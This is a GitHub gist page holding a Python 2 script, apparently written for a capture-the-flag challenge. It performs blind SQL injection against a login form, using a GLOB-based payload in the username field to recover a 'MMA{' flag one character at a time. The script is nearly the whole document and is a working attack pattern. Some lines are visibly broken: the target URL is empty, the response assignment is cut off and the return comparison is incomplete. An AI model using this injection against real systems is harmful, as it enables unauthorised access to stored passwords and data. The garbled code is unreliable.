Skip to content

Instantly share code, notes, and snippets.

@m--- m---/ Secret
Created Sep 8, 2015

What would you like to do?
# coding: utf8
import sys
import urllib
import urllib2
import string
def blind(sql):
param = {'username': sql, 'password': 'a'}
opener = urllib2.build_opener()
request = urllib2.Request('', urllib.urlencode(param))
response =
return == ''
if __name__ == '__main__':
sqli = "admin' and password glob '%s*'--"
chars = '_{}!' + string.ascii_letters + string.digits
flag = 'MMA{'
while True:
find = False
for c in chars:
test = flag + c
if blind(sqli % test) == True:
print 'find: ' + flag + c
flag = test
find = True
print test
if find == False:
print flag
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.